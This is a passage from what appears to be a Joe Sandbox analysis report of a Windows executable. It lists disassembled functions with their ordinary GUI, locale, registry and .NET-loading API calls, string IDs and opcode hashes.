                                                                                      • Instruction Fuzzy Hash: 360104917087103BF710B2769CC2F6B6188DB9435CF44003FFA469A3D3D56C8C45866A
                                                                                      Function 0041DD94 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,00418FC9,00493201), ref: 0041DD97
                                                                                      • 73A14620.GDI32(00000000,0000005A,00000000,?,00418FC9,00493201), ref: 0041DDA1
                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00418FC9,00493201), ref: 0041DDAE
                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DDBD
                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DDCB
                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DDD7
                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DDE3
                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DDF4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                      • String ID:
                                                                                      • API String ID: 2920975243-0
                                                                                      • Opcode ID: 79ba34301ffdcd870fce82e69020cd4fb5d8953881da513776c9bfc891f1925d
                                                                                      • Instruction ID: bf46a9fe5e63f1af167cdf0a983a4ac464f15f0dd566559e746e50b59b955e29
                                                                                      • Opcode Fuzzy Hash: 79ba34301ffdcd870fce82e69020cd4fb5d8953881da513776c9bfc891f1925d
                                                                                      • Instruction Fuzzy Hash: A11130706453419AE740BF655992BA63690DB64748F01813FF609AF2D2DB7A0C448B5E
                                                                                      Function 0045FAF8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0045FBFC
                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,0045FC91), ref: 0045FC02
                                                                                      • SetCursor.USER32(?,0045FC79,00007F02,00000000,0045FC91), ref: 0045FC6C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$Load
                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                      • API String ID: 1675784387-1948079669
                                                                                      • Opcode ID: 2a5e59fbc60391709db9e707cfb1b81175e986b7537cdf1dfc64ada719463c73
                                                                                      • Instruction ID: 7a834110d2e8282c1345bf2880c47fa17af2e43f078088a6ac64f542608522eb
                                                                                      • Opcode Fuzzy Hash: 2a5e59fbc60391709db9e707cfb1b81175e986b7537cdf1dfc64ada719463c73
                                                                                      • Instruction Fuzzy Hash: 81B14B30600604DFD711EF69C586B9ABBF1AF05305F1485BAE845AB7A3C778AD4CCB1A
                                                                                      Function 00408688 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,004088D0,?,?,?,?,00000000,00000000,00000000,?,004098D7,00000000,004098EA), ref: 004086A2
                                                                                        • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004964C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                                        • Part of subcall function 0040851C: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040871E,?,?,?,00000000,004088D0), ref: 0040852F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                      • API String ID: 1044490935-665933166
                                                                                      • Opcode ID: d28892a32a3756e591db26ccf56d4423c4b5dcf68a3e55eb2d1216e614db25d0
                                                                                      • Instruction ID: f7723302c3cbbcbb01f246a146743d61dec29c667e41bc47a3323a0acc4546db
                                                                                      • Opcode Fuzzy Hash: d28892a32a3756e591db26ccf56d4423c4b5dcf68a3e55eb2d1216e614db25d0
                                                                                      • Instruction Fuzzy Hash: CB514A35B00248ABDB01FBAA8941A9F7769DB98308F50D47FA141BB3C6DE3DDA05871D
                                                                                      Function 00411664 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,00411869), ref: 004116FC
                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 004117BA
                                                                                        • Part of subcall function 00411A1C: CreatePopupMenu.USER32 ref: 00411A36
                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00411846
                                                                                        • Part of subcall function 00411A1C: CreateMenu.USER32 ref: 00411A40
                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 0041182D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                      • String ID: ,$?
                                                                                      • API String ID: 2359071979-2308483597
                                                                                      • Opcode ID: 81cf1368c6a983362ffd0b97e47859e0159252f4e06a36b3365d64b72bbd56ad
                                                                                      • Instruction ID: 3f3527f43cca8a4f6c45e7f3696c032b38f9f6d147acb0657ff8a7652be0e8fd
                                                                                      • Opcode Fuzzy Hash: 81cf1368c6a983362ffd0b97e47859e0159252f4e06a36b3365d64b72bbd56ad
                                                                                      • Instruction Fuzzy Hash: CC511774A001409BDB10EF6ADC81ADA7BF9BF49304B1585BBF904E73A6D738C942CB58
                                                                                      Function 0041BDD3 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BE98
                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA7
                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BEF8
                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF06
                                                                                      • DeleteObject.GDI32(?), ref: 0041BF0F
                                                                                      • DeleteObject.GDI32(?), ref: 0041BF18
                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF35
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                      • String ID:
                                                                                      • API String ID: 1030595962-0
                                                                                      • Opcode ID: c7b0e75b457b54f40c973da1b74c3022c367d96584a0130cfc4ac672875a8614
                                                                                      • Instruction ID: 2920a3410ecffe373541ee6f53742fd475180ef7da711f6faed1b6e94a947089
                                                                                      • Opcode Fuzzy Hash: c7b0e75b457b54f40c973da1b74c3022c367d96584a0130cfc4ac672875a8614
                                                                                      • Instruction Fuzzy Hash: 0C510571E00219AFCB14DFA9D8819EEB7F9EF48314B11446AF914E7391D738AD81CB64
                                                                                      Function 0041CE48 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE6E
                                                                                      • 73A14620.GDI32(00000000,00000026), ref: 0041CE8D
                                                                                      • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEF3
                                                                                      • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF02
                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF6C
                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFAA
                                                                                      • 73A08830.GDI32(?,?,00000001,0041CFDC,00000000,00000026), ref: 0041CFCF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                      • String ID:
                                                                                      • API String ID: 2733548868-0
                                                                                      • Opcode ID: 132354002ca2fdf89728bebe702e6aaf01ac2d906efdfd832a76dcf97bd27496
                                                                                      • Instruction ID: 0295d75a013be80ecc2d975aeb153abe1d20fbb24d7cab5e263b7fb8805ed029
                                                                                      • Opcode Fuzzy Hash: 132354002ca2fdf89728bebe702e6aaf01ac2d906efdfd832a76dcf97bd27496
                                                                                      • Instruction Fuzzy Hash: 6A512970644600AFDB14DFA8C985FABBBF9AF08304F10459AF544DB292C778ED80CB58
                                                                                      Function 00455548 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,?,?), ref: 0045559A
                                                                                        • Part of subcall function 004241EC: GetWindowTextA.USER32(?,?,00000100), ref: 0042420C
                                                                                        • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                                        • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E908,?,00000001), ref: 0041EE69
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00455601
                                                                                      • TranslateMessage.USER32(?), ref: 0045561F
                                                                                      • DispatchMessageA.USER32(?), ref: 00455628
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                      • String ID: [Paused]
                                                                                      • API String ID: 1715372110-4230553315
                                                                                      • Opcode ID: 3a95339d3b00b4d4c014ba20a0af633e860cba05bef6b97c8997cd6cdd85c36c
                                                                                      • Instruction ID: 1ea6cdf9f8c4d0006da5c53b80d4ab4df920001bdb03266b2b95788fb80fd04e
                                                                                      • Opcode Fuzzy Hash: 3a95339d3b00b4d4c014ba20a0af633e860cba05bef6b97c8997cd6cdd85c36c
                                                                                      • Instruction Fuzzy Hash: AA31E6309046886ECB11DBB5DC51BEEBBB8EB49314F91447BE804E7292D73C9909CB2D
                                                                                      Function 00467594 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursor.USER32(00000000,004676D3), ref: 00467650
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046765E
                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,004676D3), ref: 00467664
                                                                                      • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,004676D3), ref: 0046766E
                                                                                      • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,004676D3), ref: 00467674
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$LoadSleep
                                                                                      • String ID: CheckPassword
                                                                                      • API String ID: 4023313301-1302249611
                                                                                      • Opcode ID: a0f55fa05c8be1d69f749fc9697138d56db45261ab8bfaff53ea542b656ce6f5
                                                                                      • Instruction ID: 0acf26c21a080d5da0313e65daee1c9aa77075bbb7fadc865c3b9f3c1b589fde
                                                                                      • Opcode Fuzzy Hash: a0f55fa05c8be1d69f749fc9697138d56db45261ab8bfaff53ea542b656ce6f5
                                                                                      • Instruction Fuzzy Hash: 2131B334648744AFD711EB79C88AF9A7BE4AF05318F1580B6B8049F3A2D7789E40CB4D
                                                                                      Function 00457E90 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457F4B
                                                                                      Strings
                                                                                      • Failed to load .NET Framework DLL "%s", xrefs: 00457F30
                                                                                      • CreateAssemblyCache, xrefs: 00457F42
                                                                                      • Fusion.dll, xrefs: 00457EEB
                                                                                      • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00457F56
                                                                                      • .NET Framework CreateAssemblyCache function failed, xrefs: 00457F6E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                      • API String ID: 190572456-3990135632
                                                                                      • Opcode ID: 6892959eac5292d5a5ac2a2cadbd2d0bd37bbeac1c13b492763255e4aa9e87a2
                                                                                      • Instruction ID: a43b4c24682a544c2646696e4a275acb35fc84741e5fc719d5cb135cb267c29f
                                                                                      • Opcode Fuzzy Hash: 6892959eac5292d5a5ac2a2cadbd2d0bd37bbeac1c13b492763255e4aa9e87a2
                                                                                      • Instruction Fuzzy Hash: 5331A771E046096FCB11EFA5D881A9FB7B4AF04715F50857AF814A7382DB3899088799
                                                                                      Function 0041C0B8 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0041BFB8: GetObjectA.GDI32(?,00000018), ref: 0041BFC5
                                                                                      • GetFocus.USER32 ref: 0041C0D8
                                                                                      • 73A0A570.USER32(?), ref: 0041C0E4
                                                                                      • 73A08830.GDI32(?,?,00000000,00000000,0041C163,?,?), ref: 0041C105
                                                                                      • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C163,?,?), ref: 0041C111
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C128
                                                                                      • 73A08830.GDI32(?,00000000,00000000,0041C16A,?,?), ref: 0041C150
                                                                                      • 73A0A480.USER32(?,?,0041C16A,?,?), ref: 0041C15D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A08830$A022A480A570BitsFocusObject
                                                                                      • String ID:
                                                                                      • API String ID: 1424713005-0
                                                                                      • Opcode ID: b5ec816d879f7673cf2204928d24ade75243476a1e646848f60b5da6794254d2
                                                                                      • Instruction ID: be6d8328aec04e85a436dd0cf8ae2147a44d9b66c6d411dca3268b31211d8f12
                                                                                      • Opcode Fuzzy Hash: b5ec816d879f7673cf2204928d24ade75243476a1e646848f60b5da6794254d2
                                                                                      • Instruction Fuzzy Hash: B2116A71A40618BFDB10DBA9CC86FAFB7FCEF48700F54446AB514E7281D6789D008B68
                                                                                      Function 0047E3D8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0047E490), ref: 0047E475
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpen
                                                                                      • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                      • API String ID: 47109696-2530820420
                                                                                      • Opcode ID: 3fe8207b4309967a2eec740b8de24a374655ee6a60c09589a25f0ee3bbab2cf7
                                                                                      • Instruction ID: 46a45326e1d9b5ff3e072bf084057b1a8ce9b2520be3d98a23739a38d90d80f2
                                                                                      • Opcode Fuzzy Hash: 3fe8207b4309967a2eec740b8de24a374655ee6a60c09589a25f0ee3bbab2cf7
                                                                                      • Instruction Fuzzy Hash: 8F11BB30714204AADB10DA778806BDA3AA8EB09358F51C5B7A908E7392EB7C9901C75C
                                                                                      Function 0041B3D2 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                                      • DeleteDC.GDI32(?), ref: 0041B449
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$Delete$Stretch
                                                                                      • String ID:
                                                                                      • API String ID: 1458357782-0
                                                                                      • Opcode ID: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                                      • Instruction ID: 073f11bba2386bee955988a390c3df6f0cbda7ed7a331810ab0cae2060ca734e
                                                                                      • Opcode Fuzzy Hash: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                                      • Instruction Fuzzy Hash: F9114C72E40659ABDF10D6D9D985FAFB3BCEF08704F048456B614FB242C678A8418B54
                                                                                      Function 0048FCB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,?,00000000), ref: 0048FCC5
                                                                                        • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0048FCE7
                                                                                      • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0049023D), ref: 0048FCFB
                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 0048FD1D
                                                                                      • 73A0A480.USER32(00000000,00000000,0048FD47,0048FD40,?,00000000,?,?,00000000), ref: 0048FD3A
                                                                                      Strings
                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0048FCF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                      • API String ID: 1435929781-222967699
                                                                                      • Opcode ID: 3db6766931fef7b11a742d2f2d9c48b6603b492ecea0d86a82d8ef65d75c1a51
                                                                                      • Instruction ID: be2ae6e373cd916ce709c39e3fbc403556832e2453e100614d5f9d9249756fbf
                                                                                      • Opcode Fuzzy Hash: 3db6766931fef7b11a742d2f2d9c48b6603b492ecea0d86a82d8ef65d75c1a51
                                                                                      • Instruction Fuzzy Hash: BE018876604604BFEB01EBA5CC45F5FB3ECDB49704F510476B604E7281D678AD008B68
                                                                                      Function 00423304 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32 ref: 0042331F
                                                                                      • WindowFromPoint.USER32(?,?), ref: 0042332C
                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042333A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00423341
                                                                                      • SendMessageA.USER32(00000000,00000084,?,?), ref: 0042335A
                                                                                      • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423371
                                                                                      • SetCursor.USER32(00000000), ref: 00423383
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1770779139-0
                                                                                      • Opcode ID: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                                      • Instruction ID: 4e500bdd1cb7c406dcecfc45487f359b17b305850d12e3c552a5b3a09f906ed3
                                                                                      • Opcode Fuzzy Hash: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
